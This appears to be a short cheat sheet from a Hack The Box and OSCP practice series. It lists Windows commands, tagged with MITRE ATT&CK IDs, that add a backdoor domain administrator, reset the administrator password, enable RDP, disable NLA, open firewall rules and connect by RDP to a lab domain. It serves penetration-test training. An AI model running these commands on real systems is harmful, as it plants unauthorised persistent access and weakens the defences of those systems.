Vonnie Hudson
How To Hack The Box To Your OSCP (The Bonus Boxes)
================================
IMPACT: Persistence
--------------------------------

whoami
net user vonnie Password-123! /add /domain  
net localgroup Administrators "Remote Desktop Users" /add vonnie
net user vonnie "Password-123!"

# MITRE ATT&CK T1098 Persistence: Account Manipulation 
net user administrator "Password-123!"

# enable RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# turn off NLA
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f

# MITRE ATT&CK DEFENSE EVASION: T1562.004: Impair Defenses: Disable System Firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

# MITRE ATT&CK Lateral Movement: T1021.001: Remote Services RDP
sudo rdesktop -u SCRM\\administrator -p Password-123! scrm.local